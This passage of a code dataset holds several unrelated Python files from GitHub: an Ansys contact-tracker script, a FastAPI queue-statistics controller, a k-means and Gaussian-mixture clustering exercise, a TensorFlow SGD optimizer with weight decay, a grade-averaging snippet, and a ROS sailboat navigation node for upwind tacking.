model.Analyses[0]\nsol_info = analysis.Solution.SolutionInformation\n\n# Get all nonlinear connections and contacts\nconns = model.Connections\ncontacts = conns.GetChildren(DataModelObjectCategory.ContactRegion, True)\nlinear_contacts = [ContactType.Bonded, ContactType.NoSeparation]\ncontacts = [c for c in contacts if c.ContactType not in linear_contacts]\nsupp_conts = [c for c in contacts if c.Suppressed]\n\n# Create contact trackers\ntrackers = {}\nwith Transaction(True): # Suppress GUI update until complete to speed the process\n for c in contacts:\n trackers[c] = []\n \n # Create Number Contacting tracker\n _ = sol_info.AddNumberContacting()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Contact Pressure tracker\n _ = sol_info.AddContactPressure()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Penetration tracker\n _ = sol_info.AddPenetration()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Max Normal Stiffness tracker\n _ = sol_info.AddContactMaximumNormalStiffness()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Stabilization Energy tracker\n _ = sol_info.AddStabilizationEnergy()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Force Convergence tracker\n _ = sol_info.AddContactPairForceConvergenceNorm()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Gap tracker\n _ = sol_info.AddGap()\n _.ContactRegion = c\n trackers[c].append(_)\n \n# Rename the trackers by definition\nfor c, tr in trackers.items():\n for t in tr:\n t.RenameBasedOnDefinition()\n\n# Place the trackers into grouping folders for each contact\ngroups =[]\nfor i, c in enumerate(trackers.keys()):\n groups.append(Tree.Group(trackers[c]))\n groups[i].Name = \"Contact - \" + c.Name\n\n# Place the tracker folders into one common folder\ngrps = Tree.Group(groups)\ngrps.Name = \"Contact Trackers\"\n\nTree.Activate([analysis.Solution])","repo_name":"lytemar/Ansys-Mechanical-Scripts","sub_path":"add_contact_trackers_for_all_nonlinear_contacts.py","file_name":"add_contact_trackers_for_all_nonlinear_contacts.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
{"seq_id":"27969096094","text":"from fastapi import Depends, APIRouter, Response\nfrom fastapi.security import HTTPBearer\nfrom app.http.services.queue import QueueStatisticsService, PeriodsLoadQueue, PeriodsActiveQueue\nfrom dependency_injector.wiring import Provide, inject\nfrom app.kernel.container import Container\nfrom app.http.services.helpers import default_error\nfrom pydantic import ValidationError\n\nroute = APIRouter(\n prefix=\"/queue/statistics\",\n tags=['queues_statistics'],\n responses={404: {\"description\": \"Not found\"}} \n)\n\nsecurity = HTTPBearer()\n\n\n@route.get(\"/loading/{uuid}\")\n@inject\ndef loading_the_queue(\n uuid: str, \n period: PeriodsLoadQueue,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n try:\n result = stat_service.queue_load(uuid, type_period=period)\n except Exception as e:\n err = default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result\n\n@route.get(\"/active_queues\")\n@inject\ndef operation_of_active_queues(\n period: PeriodsActiveQueue,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n    
try:\n result = stat_service.active_queues(period)\n except Exception as e:\n err = default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result\n\n@route.get(\"/total_statistics/{uuid}\")\n@inject\ndef total_statistics_this_queue(\n uuid: str,\n seconds: int,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n try:\n result = stat_service.total_stat_queue(uuid, seconds)\n except Exception as e:\n err = default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result","repo_name":"BeyonD311/python_project","sub_path":"app/http/controllers/queue_statistic_controller.py","file_name":"queue_statistic_controller.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3815532359","text":"import itertools\nimport random\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport scipy.stats as st\nimport pandas as pd\nfrom itertools import permutations\n\n\nK = 4\nINF = 9999999\nD = 2\nN = 1000\nn = 250\ncolors = \"bgrcmykw\"\n\n\ndef create_data():\n # mean = create_random_mean(K, D)\n mean = create_fixed_mean()\n cov = create_random_cov(K, D)\n X = np.zeros((N, D))\n color_index = 0\n for i in range(K):\n x = np.random.multivariate_normal(mean[i], cov=cov[i], size=n)\n plt.scatter(x[:, 0], x[:, 1], c=colors[color_index], marker=\".\")\n color_index = color_index + 1\n for j in range(n):\n X[j + i * n] = x[j]\n plt.title(\"Original Distribution\")\n plt.show()\n return X, mean\n\n\ndef create_random_cov(k, d):\n cov = np.zeros((k, d, d))\n for i in range(k):\n cov[i] = np.identity(d)\n for j in range(d):\n cov[i][j][j] = random.uniform(3, 5)\n return cov\n\n\ndef create_random_mean(k, f):\n mean = np.zeros((k, f))\n for i in range(k):\n for j in range(f):\n mean[i][j] = random.randint(-10, 10)\n return mean\n\n\ndef create_fixed_mean():\n # return [[-5, -5], [-5, 5], [5, -5], [5, 5]]\n return [[-4, -4], [-5, 6], [6, -5], [6, 4]]\n\n\ndef create_random_gmm_num(k, d):\n mean = create_random_mean(k, d)\n cov = np.zeros((k, d, d))\n for i in range(k):\n cov[i] = np.identity(d)\n ratio = np.ones(k) / k\n return mean, cov, ratio\n\n\ndef k_means(X, k, threshold=1e-20):\n X_flag = np.zeros(X.shape[0])\n mean = create_random_mean(k, X.shape[1])\n dis_start = cal_distance_all(X, k, mean)\n while True:\n dis_end = dis_start\n for i in range(X.shape[0]):\n flag = 0\n min_dis = INF\n for j in range(k):\n if min_dis > cal_distance(X[i, :], mean[j, :]):\n min_dis = cal_distance(X[i, :], mean[j, :])\n flag = j\n X_flag[i] = flag\n mean = update_mean(X, k, X_flag)\n dis_start = cal_distance_all(X, k, mean)\n if np.fabs(dis_end - dis_start) < threshold:\n break\n return mean, X_flag\n\n\ndef gmm(X, k, threshold=1e-5):\n mean, cov, ratio = create_random_gmm_num(k, X.shape[1])\n mean, x = k_means(X, k)\n last_log_likelihood = cal_log_likelihood(X, k, mean, cov, ratio)\n iters = 0\n while True:\n y_z = step_e(X, k, mean, cov, ratio)\n mean, cov, ratio = step_m(X, k, mean, cov, ratio, y_z)\n now_log_likelihood = cal_log_likelihood(X, k, mean, cov, ratio)\n print(now_log_likelihood)\n if last_log_likelihood < now_log_likelihood and (now_log_likelihood - last_log_likelihood) < threshold:\n break\n last_log_likelihood = now_log_likelihood\n iters = iters + 1\n if iters >= 50:\n break\n return X, y_z, mean\n\n\ndef draw_gmm(X, 
y_z, k, mean):\n label = np.zeros(X.shape[0])\n for i in range(k):\n label[i * n: (i + 1) * n] = i\n X = np.hstack((X, label.reshape(-1, 1)))\n for i in range(X.shape[0]):\n X[i, -1] = np.argmax(y_z[i, :])\n draw(X, k, mean, \"GMM \")\n\n\ndef draw_k_means(X, X_flag, k, mean):\n X = np.hstack((X, X_flag.reshape(-1, 1)))\n draw(X, k, mean, \"K_means \")\n\n\ndef draw(X, k, real_mean, method):\n for i in range(k):\n x = []\n for j in range(X.shape[0]):\n if X[j, -1] == i:\n x.append(X[j, 0:2])\n x = np.array(x)\n cal_mean = np.mean(x, axis=0)\n min = INF\n real_label = 0\n for p in range(k):\n if cal_distance(cal_mean, real_mean[p]) < min:\n min = cal_distance(cal_mean, real_mean[p])\n real_label = p\n\n colors_array = np.full(x.shape[0], colors[real_label], dtype=np.str_)\n plt.scatter(x[:, 0], x[:, 1], c=colors_array, marker=\".\")\n acc = cal_accuracy(X, k)\n plt.title(method + \"Classification\")\n plt.show()\n\n\ndef cal_accuracy(X, k):\n # compute the classification accuracy\n accuracy = []\n per = np.zeros(k)\n for i in range(k):\n per[i] = i\n per = np.array(list(itertools.permutations([0, 1, 2, 3])))\n for i in range(per.shape[0]):\n count = 0\n for j in range(k):\n for p in range(int(X.shape[0] / k)):\n if X[p + (j * int(X.shape[0] / k)), -1] == per[i][j]:\n count = count + 1\n accuracy.append(count / X.shape[0])\n num_acc = np.argmax(accuracy)\n acc = accuracy[num_acc]\n print(\"Accuracy: \"+str(acc))\n return acc\n\n\ndef step_e(X, k, mean, cov, ratio):\n # E-step\n # y_z: posterior probability of each sample under the Gaussian mixture\n # ratio: mixing proportion of each Gaussian component\n # mean: mean of each Gaussian component\n # cov: covariance matrix of each Gaussian component\n y_z = np.zeros((X.shape[0], k))\n for i in range(X.shape[0]):\n # compute each sample's posterior probability under the mixture\n ratio_sum = 0\n ratio_pdf = np.zeros(k)\n for j in range(k):\n ratio_pdf[j] = ratio[j] * st.multivariate_normal.pdf(X[i], mean=mean[j], cov=cov[j])\n ratio_sum = ratio_sum + ratio_pdf[j]\n for j in range(k):\n y_z[i, j] = ratio_pdf[j] / ratio_sum\n return y_z\n\n\ndef step_m(X, k, mean, cov, ratio, y_z):\n # M-step: update the parameters\n new_mean = np.zeros(mean.shape)\n new_cov = np.zeros(cov.shape)\n new_ratio = np.zeros(ratio.shape)\n for j in range(k):\n new_ratio[j] = np.sum(y_z[:, j]) / X.shape[0]\n y = y_z[:, j].reshape(-1, 1)\n new_mean[j, :] = (y.T @ X) / np.sum(y)\n new_cov[j] = ((X - mean[j]).T @ np.multiply((X - mean[j]), y) / np.sum(y))\n return new_mean, new_cov, new_ratio\n\n\ndef update_mean(X, k, X_flag):\n new_center = np.zeros((k, X.shape[1]))\n for i in range(k):\n count = 0\n for j in range(X.shape[0]):\n if X_flag[j] == i:\n new_center[i, :] = new_center[i, :] + X[j, :]\n count = count + 1\n if count != 0:\n new_center[i, :] = new_center[i, :] / count\n return new_center\n\n\ndef cal_log_likelihood(X, k, mean, cov, ratio):\n log_sum = 0\n for i in range(X.shape[0]):\n ratio_pdf_sum = 0\n for j in range(k):\n ratio_pdf_sum = ratio_pdf_sum + ratio[j] * st.multivariate_normal.pdf(X[i], mean=mean[j], cov=cov[j])\n log_sum = log_sum + np.log(ratio_pdf_sum)\n return log_sum\n\n\ndef cal_distance(X, center):\n return np.sum(np.power((X - center), 2))\n\n\ndef cal_distance_all(X, k, center):\n dis = 0\n for i in range(X.shape[0]):\n for j in range(k):\n dis = dis + cal_distance(X[i, :], center[j, :])\n return dis\n\n\ndef main():\n\n # generate the data and the true means\n X, real_mean = create_data()\n\n # # k_means\n # mean_k_means, X_flag = k_means(X, K)\n # draw_k_means(X, X_flag, K, real_mean)\n\n # GMM_EM\n X_gmm, y_z, mean_gmm = gmm(X, K)\n draw_gmm(X, y_z, K, real_mean)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"1190200610/mechine_learning","sub_path":"k_means_and_GMM.py","file_name":"k_means_and_GMM.py","file_ext":"py","file_size_in_byte":6990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10592255672","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import gen_array_ops\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.python.ops import variables as tf_variables\nfrom tensorflow.python.training import gradient_descent\nfrom libs.kfac import estimator as est\n\n\nclass SGDOptimizer(gradient_descent.GradientDescentOptimizer):\n \"\"\"\n SGD Optimizer\n \"\"\"\n\n def __init__(self,\n learning_rate,\n var_list=None,\n momentum=0.,\n weight_decay=0.,\n weight_decay_type=\"l2\",\n weight_list=\"all\",\n name=\"SGD\"):\n\n variables = var_list\n if variables is None:\n variables = tf_variables.trainable_variables()\n self.variables = variables\n\n weight_decay_type = weight_decay_type.lower()\n legal_weight_decay_types = [\"wd\", \"l2\", \"fisher\"]\n\n if weight_decay_type not in legal_weight_decay_types:\n raise ValueError(\"Unsupported weight decay type {}. Must be one of {}.\"\n .format(weight_decay_type, legal_weight_decay_types))\n\n self._momentum = momentum\n self._weight_decay = weight_decay\n self._weight_decay_type = weight_decay_type\n self._weight_list = weight_list\n\n super(SGDOptimizer, self).__init__(learning_rate, name=name)\n\n def minimize(self, *args, **kwargs):\n kwargs[\"var_list\"] = kwargs.get(\"var_list\") or self.variables\n if set(kwargs[\"var_list\"]) != set(self.variables):\n raise ValueError(\"var_list doesn't match with set of Fisher-estimating \"\n \"variables.\")\n return super(SGDOptimizer, self).minimize(*args, **kwargs)\n\n def compute_gradients(self, *args, **kwargs):\n # args[1] could be our var_list\n if len(args) > 1:\n var_list = args[1]\n else:\n kwargs[\"var_list\"] = kwargs.get(\"var_list\") or self.variables\n var_list = kwargs[\"var_list\"]\n if set(var_list) != set(self.variables):\n raise ValueError(\"var_list doesn't match with set of Fisher-estimating \"\n \"variables.\")\n return super(SGDOptimizer, self).compute_gradients(*args, **kwargs)\n\n def apply_gradients(self, grads_and_vars, *args, **kwargs):\n grads_and_vars = list(grads_and_vars)\n\n if self._weight_decay > 0.0:\n if self._weight_decay_type == \"l2\" or self._weight_decay_type == \"wd\":\n grads_and_vars = self._add_weight_decay(grads_and_vars)\n\n steps_and_vars = self._compute_update_steps(grads_and_vars)\n return super(SGDOptimizer, self).apply_gradients(steps_and_vars,\n *args, **kwargs)\n\n def _add_weight_decay(self, vecs_and_vars):\n if self._weight_list == \"all\":\n print(\"all\")\n return [(vec + self._weight_decay * gen_array_ops.stop_gradient(var), var)\n for vec, var in vecs_and_vars]\n elif self._weight_list == \"last\":\n print(\"last\")\n grad_list = []\n for vec, var in vecs_and_vars:\n if 'fc' not in var.name:\n grad_list.append((vec, var))\n else:\n grad_list.append(\n (vec + self._weight_decay *\n gen_array_ops.stop_gradient(var), var))\n return grad_list\n else:\n print(\"conv\")\n grad_list = []\n for vec, var in vecs_and_vars:\n if 'fc' in var.name:\n grad_list.append((vec, var))\n else:\n grad_list.append(\n (vec + self._weight_decay 
*\n gen_array_ops.stop_gradient(var), var))\n return grad_list\n\n def _compute_update_steps(self, grads_and_vars):\n return self._update_velocities(grads_and_vars, self._momentum)\n\n def _update_velocities(self, vecs_and_vars, decay, vec_coeff=1.0):\n def _update_velocity(vec, var):\n velocity = self._zeros_slot(var, \"velocity\", self._name)\n with ops.colocate_with(velocity):\n # Compute the new velocity for this variable.\n new_velocity = decay * velocity + vec_coeff * vec\n\n # Save the updated velocity.\n return (array_ops.identity(velocity.assign(new_velocity)), var)\n\n # Go through each variable and update its associated part of the velocity vector.\n return [_update_velocity(vec, var) for vec, var in vecs_and_vars]\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"libs/sgd/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
{"seq_id":"40975036228","text":"# sum to average \n\nn1 = float(input(\"Enter your grade: \"))\nn2 = float(input(\"Enter your grade: \"))\n\naverage = (n1 + n2) / 2\n\n# printing result\nprint(\"The average between {} and {} \\n The result: {}\".format(n1, n2, average))\n\n# () has priority at the first math level\n# characters *, /, **, % have priority at the second math level\n# characters +, - have priority at the third math level","repo_name":"alejandrosilveiraramos/moreDevsTwoBlu","sub_path":"classes/module02/class02.py","file_name":"class02.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18943726447","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom actionlib import SimpleActionClient\nfrom boat_msgs.msg import BoatState, GPS, MaxVMGAction, MaxVMGGoal, Point, Waypoint, TackingAction, TackingGoal, LaylineAction, LaylineGoal\nfrom boat_msgs.srv import ConvertPoint\nfrom std_msgs.msg import Float32\nfrom boat_utilities import points, angles, units\n\n## Trigger for when the wind shifts significantly\nnew_wind = False\n\n## Trigger for when we are navigating towards a brand new target\nis_new_target = False\n\n## The relative apparent wind heading, in degrees CCW from East\nane_reading = 0\n\n## The true apparent wind heading, in degrees CCW from East\napparent_wind_heading = 0\n\n## The current `boat_msgs.msg.BoatState`\nstate = BoatState()\n\n## The `boat_msgs.msg.Waypoint` describing the location to navigate to\ntarget = Waypoint()\n\n## The angle to the target point, in degrees CCW from East\ntarget_heading = 0\n\n## The current boat heading, in degrees CCW from East\ncur_boat_heading = 0\n\n## Initial position of the boat when a new target is added\nstart_pos = Point()\n\n## Current boat position\ncur_pos = Point()\n\n## The boat's speed, in m/s\nboat_speed = 0\n\n## Minimum boat speed (in m/s) required to tack:\nmin_tacking_speed = rospy.get_param('/boat/nav/min_tacking_speed')\n\n## The maximum VMG found, in m/s\nmax_vmg = 0\n\n## Whether or not the max VMG has been found\nfound_max_vmg = False\n\n## Direct heading to next mark\ndirect_heading = 0\n\n## Beating parameter for determining when to tack\np = rospy.get_param('/boat/nav/beating')\n\n## The angle within which the boat cannot go (Irons)\nlayline = rospy.get_param('/boat/nav/layline')\n\n# Declare the publishers for the node\nheading_pub = rospy.Publisher('target_heading', Float32, queue_size=10)\nboat_state_pub = rospy.Publisher('boat_state', BoatState, 
queue_size=10)\nmax_vmg_client = SimpleActionClient('max_vmg_action', MaxVMGAction)\ntacking_client = SimpleActionClient('tacking_action', TackingAction)\nlayline_client = SimpleActionClient('layline_action', LaylineAction)\n\n# Service to convert gps to lps\nto_lps = rospy.ServiceProxy('gps_to_lps', ConvertPoint)\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= ROS Callbacks =*=*=*=*=*=*=*=*=*=*=*=*=\n\n\n##\tCallback for setting the boat state when the `/boat_state` topic is updated\n#\n#\t@param new_state The new `boat_msgs.msg.BoatState` to set\n#\ndef boat_state_callback(new_state):\n global state\n state = new_state\n\n\n##\tCallback for setting the apparent wind heading when the `/anemometer` topic is updated\n#\n#\t@param new_heading The new anemometer reading, 180 is directly in front of boat increasing CCW\n#\ndef anemometer_callback(new_heading):\n global ane_reading\n global apparent_wind_heading\n global new_wind\n ane_reading = new_heading.data\n new_wind_heading = angles.normalize(ane_reading + cur_boat_heading)\n\n # Tolerance on a wind shift to be determined\n # Only update wind heading if a significant shift is detected, because it will then replan our upwind path\n if abs(new_wind_heading - apparent_wind_heading) > 0.1:\n new_wind = True\n apparent_wind_heading = new_wind_heading\n\n\n##\tCallback for setting the boat speed when the `/gps_raw` topic is updated\n#\n#\t@param gps The `boat_msgs.msg.GPS` message containing the current boat speed\n#\ndef gps_callback(gps):\n global boat_speed\n boat_speed = units.from_knots(gps.speed)\n\n\n##\tCallback for setting the boat's heading when the `/compass` topic is updated.\n#\n#\t@param compass The new heading to set, in degrees CCW from East\n#\ndef compass_callback(compass):\n global apparent_wind_heading\n global new_wind\n global cur_boat_heading\n global target_heading\n\n cur_boat_heading = compass.data\n new_wind_heading = angles.normalize(ane_reading + cur_boat_heading)\n\n # Tolerance on a wind shift to be determined\n # Only update wind heading if a significant shift is detected, because it will then replan our upwind path\n if abs(new_wind_heading - apparent_wind_heading) > 0.1:\n new_wind = True\n apparent_wind_heading = new_wind_heading\n\n # If we are in RC, update our target heading to be the same direction as we are pointing, so the path planner\n # will work when we switch to auto\n if state.major is not BoatState.MAJ_AUTONOMOUS:\n target_heading = cur_boat_heading\n\n\n##\tCallback for setting the target point when the `/target_point` topic is updated.\n#\n#\t@param new_target The `boat_msgs.msg.Waypoint` to set\n#\ndef target_callback(new_target):\n global target\n global is_new_target\n global start_pos\n\n new_target = Waypoint(to_lps(new_target.pt).pt, new_target.type)\n # If the target has changed, save the new target\n if abs(target.pt.x - new_target.pt.x) > 0.01 or abs(target.pt.y - new_target.pt.y) > 0.01:\n is_new_target = True\n target = new_target\n start_pos = cur_pos\n\n\n##\tCallback for setting the boat's location when the `/lps` topic is updated.\n#\n#\t@param position The `boat_msgs.msg.Point` to set\n#\ndef position_callback(position):\n global cur_pos\n cur_pos = position\n\n # If the boat isn't in the autonomous planning state, exit\n if state.major is not BoatState.MAJ_AUTONOMOUS or state.minor is not BoatState.MIN_PLANNING:\n return\n\n # Temporary jank solution\n if state.challenge is BoatState.CHA_AVOID:\n return\n\n awa_algorithm()\n\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= Calculations 
=*=*=*=*=*=*=*=*=*=*=*=*=\n'''\n##\tCalculate the current velocity made good along the specified heading\n#\n#\t@param direct_heading The direct heading to the target, in degrees CCW from East\n#\t@return The current velocity made good\n#\ndef vmg(direct_heading):\n\treturn math.cos(cur_boat_heading - direct_heading) * boat_speed\n'''\n\n\n##\tCalculate the global maximum velocity made good of the entire system\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The theoretical max velocity made good\n#\ndef calc_global_max_vmg(wind_coming):\n\n # TODO: Make a service and make more general for object avoidance\n upper_bound = angles.normalize(wind_coming + layline)\n lower_bound = angles.normalize(wind_coming - layline)\n\n # If direct heading is in irons, then max_vmg will be on the edge of the no go zone\n if angles.is_within_bounds(direct_heading, lower_bound, upper_bound):\n\n # Snap to whichever edge of the no go zone is closer\n if angles.is_on_left(direct_heading, wind_coming):\n vmg_heading = upper_bound\n else:\n vmg_heading = lower_bound\n\n # Otherwise max vmg is just the direct heading\n else:\n vmg_heading = direct_heading\n\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n max_vmg = theoretic_boat_speed * angles.cosd(vmg_heading - direct_heading)\n return max_vmg, vmg_heading\n\n\n##\tCalculate the maximum velocity made good on the current tack\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The theoretical max velocity made good\n#\ndef calc_cur_tack_max_vmg(wind_coming):\n\n # TODO: Make a service and make more general for object avoidance\n upper_bound = angles.normalize(wind_coming + layline)\n lower_bound = angles.normalize(wind_coming - layline)\n\n # If direct heading is in irons, then max_vmg will be on the edge of the no go zone\n if angles.is_within_bounds(direct_heading, lower_bound, upper_bound):\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n\n # Snap to whichever edge of the no go zone is closer\n if angles.is_on_left(target_heading, wind_coming):\n vmg_heading = upper_bound\n else:\n vmg_heading = lower_bound\n\n # If the direct heading is somewhere in our current tack (direct_heading and target_heading on same side of wind)\n elif (angles.is_on_left(direct_heading, wind_coming) and angles.is_on_left(target_heading, wind_coming)) or\\\n (angles.is_on_right(direct_heading, wind_coming) and angles.is_on_right(target_heading, wind_coming)):\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n vmg_heading = direct_heading\n\n # If none of the above, the best heading will be on the opposite tack\n # however it is extremely unfavourable because clearly no best heading lies on this tack\n else:\n theoretic_boat_speed = 0\n vmg_heading = apparent_wind_heading\n\n max_vmg = theoretic_boat_speed * angles.cosd(vmg_heading - direct_heading)\n return max_vmg, vmg_heading\n\n\n##\tCalculate the current velocity made good along the current target heading\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The velocity made good\n#\ndef calc_vmg(wind_coming):\n tolerance = 1.0\n upper_bound = angles.normalize(wind_coming + layline - tolerance)\n lower_bound = angles.normalize(wind_coming - layline + tolerance)\n\n # If we are in irons, our theoretical speed is 0\n if angles.is_within_bounds(target_heading, 
lower_bound, upper_bound):\n theoretic_boat_speed = 0\n else:\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n\n cur_vmg = theoretic_boat_speed * angles.cosd(target_heading - direct_heading)\n return cur_vmg\n\n\n##\tCalculate the distance from the boat to the current target\n#\n#\t@param Boat's current position\n#\t@return The distance, in meters\n#\ndef dist_to_target(position):\n return points.dist(target.pt, position)\n\n\n## Determine the percentage of the course to the target is remaining\n#\n#\t@return Percentage of course remaining\n#\ndef remaining_course():\n cur_angle = angles.atan2d(cur_pos.y - start_pos.y, cur_pos.x - start_pos.x)\n start_angle = angles.atan2d(target.pt.y - start_pos.y, target.pt.x - start_pos.x)\n cur_angle = angles.normalize(cur_angle)\n start_angle = angles.normalize(start_angle)\n tot_dist = math.hypot(target.pt.y - start_pos.y, target.pt.x - start_pos.x)\n cur_dist = math.hypot(cur_pos.y - start_pos.y, cur_pos.x - start_pos.x)\n proj_dist = cur_dist * angles.cosd(cur_angle - start_angle)\n return 100 - (proj_dist / tot_dist) * 100.0\n\n\n## Determine if the boat is on the layline and can make the mark on the current heading\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@param tolerance The angular tolerance to the direct heading that the target heading needs to be\n#\t@return True for can make it, and false for not\n#\ndef on_layline(wind_coming, tolerance):\n\n # If waypoint is on left side of the wind, we are on the layline iff the target heading\n # is to the right of the direct heading\n if angles.is_on_left(direct_heading, wind_coming):\n val = angles.is_on_right(target_heading, direct_heading + tolerance)\n\n # If waypoint is on right side of the wind, we are on the layline iff the target heading\n # is to the left of the direct heading\n else:\n val = angles.is_on_left(target_heading, direct_heading - tolerance)\n\n return val\n\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= Algorithms =*=*=*=*=*=*=*=*=*=*=*=*=\n\n\ndef awa_algorithm():\n global found_max_vmg\n global max_vmg\n global target_heading\n global new_wind\n global is_new_target\n global direct_heading\n\n # Calculate the direct heading to the next waypoint\n old_direct_heading = direct_heading\n direct_heading = angles.atan2d(target.pt.y - cur_pos.y, target.pt.x - cur_pos.x)\n direct_heading = angles.normalize(direct_heading)\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # TODO: Make n a function of boat speed to negate the effects of apparent wind?\n # Tacking weight, can add app_wind_offset here to make even less desirable\n n = 1 + p * 1.3 / dist_to_target(start_pos)\n\n # Tolerance the headings and the wind possibly\n # TODO: Add a slow timer to this as well. 
Sometimes on state changes we get stuck because nothing updates.\n if new_wind or is_new_target or direct_heading is not old_direct_heading:\n new_wind = False\n is_new_target = False\n found_max_vmg = False\n max_vmg = 0\n\n # Calculate vmg on current path\n cur_vmg = calc_vmg(wind_coming)\n\n # Calculate max global vmg\n global_max_vmg, global_vmg_heading = calc_global_max_vmg(wind_coming)\n\n # Calculate the max vmg on the current tack\n cur_tack_max_vmg, cur_tack_vmg_heading = calc_cur_tack_max_vmg(wind_coming)\n\n #rospy.loginfo(rospy.get_caller_id() +\" Cur VMG: %f Max VMG: %f with Heading: %f Cur Tack VMG: %f with Heading: %f Direct Heading: %f\", cur_vmg, global_max_vmg, global_vmg_heading, cur_tack_max_vmg, cur_tack_vmg_heading, direct_heading)\n per_course_left = remaining_course()\n\n # TODO: Tolerance these properly\n # If not currently at our optimal vmg, during our regular upwind routine (not layline setup)\n if (global_max_vmg > cur_vmg or cur_tack_max_vmg > cur_vmg):\n # Is tack required to get to vmg_heading\n if (angles.is_on_left(global_vmg_heading, target_heading) and angles.is_on_left(wind_coming, target_heading) and angles.is_on_right(wind_coming, global_vmg_heading)) or\\\n (angles.is_on_right(global_vmg_heading, target_heading) and angles.is_on_left(wind_coming, global_vmg_heading) and angles.is_on_right(wind_coming, target_heading)):\n # If this loop is entered, then getting to vmg_heading requires a tack\n # Now we need to calculate if the tack is worth it\n if global_max_vmg > cur_tack_max_vmg * n and boat_speed >= min_tacking_speed:\n # Worth the tack, therefore determine the tacking direction and execute the action\n target_heading = global_vmg_heading\n if angles.is_on_left(target_heading, wind_coming):\n tacking_direction = -1\n else:\n tacking_direction = 1\n\n heading_pub.publish(Float32(target_heading))\n goal = TackingGoal(direction=tacking_direction)\n tacking_client.send_goal(goal)\n\n # Adjust time delay until the tack is considered failed, and we return to planning\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n goal.direction = goal.direction * -1\n tacking_client.send_goal(goal)\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n if tacking_client.get_result() is not None:\n target_heading = tacking_client.get_result().target_heading\n rospy.loginfo(rospy.get_caller_id() + \" Boat State = 'Autonomous - Planning'\")\n heading_pub.publish(target_heading)\n\n # If the tack is not worth preforming, set the current heading to be the max vmg of our current tack\n else:\n target_heading = cur_tack_vmg_heading\n #print target_heading\n heading_pub.publish(Float32(target_heading))\n\n # Tack is not required to get to vmg_heading, therefore set it\n else:\n target_heading = global_vmg_heading\n heading_pub.publish(Float32(target_heading))\n\n # Final leg of the course, traveling on an optimal vmg course, time to get to layline. Second condition to make sure this doesn't run if we are already on the layline\n # TODO: Tolerance correctly, make sure this isnt called on a downwind cuz we mistolerance it. Shouldnt be because target_heading will constantly be updating to be equal to global_vmg_heading above\n # TODO: Ensure this is only called once per run. 
Currently if we have a short laylineaction, it can get repeated\n elif (per_course_left <= 40 and not on_layline(wind_coming, 1.0)\n and boat_speed >= min_tacking_speed):\n rospy.loginfo(\n rospy.get_caller_id() +\n \" Entering the navigate to layline routine. Saved current tack angle as: %f \",\n target_heading)\n goal = LaylineGoal(alt_tack_angle=target_heading, overshoot_angle=3.0, target=target)\n layline_client.send_goal(goal)\n\n # Adjust time delay until the layline setup action is considered failed, and we return to planning\n if not layline_client.wait_for_result(rospy.Duration(40)):\n layline_client.cancel_goal()\n if layline_client.get_result() is not None:\n target_heading = layline_client.get_result().target_heading\n\n rospy.Rate(100).sleep()\n\n\n# DEPRECATED\ndef taras_algorithm():\n global state\n global apparent_wind_heading\n global new_wind\n global target\n global is_new_target\n global target_heading\n\n # Calculate the direct heading to the next waypoint\n # This should never be undefined, as the atan2(0,0) case would already be caught by the proximity check above\n best_heading = angles.atan2d(target.pt.y - cur_pos.y, target.pt.x - cur_pos.x)\n best_heading = angles.normalize(best_heading)\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # If the direct path isn't possible...\n if best_heading > wind_coming - layline and 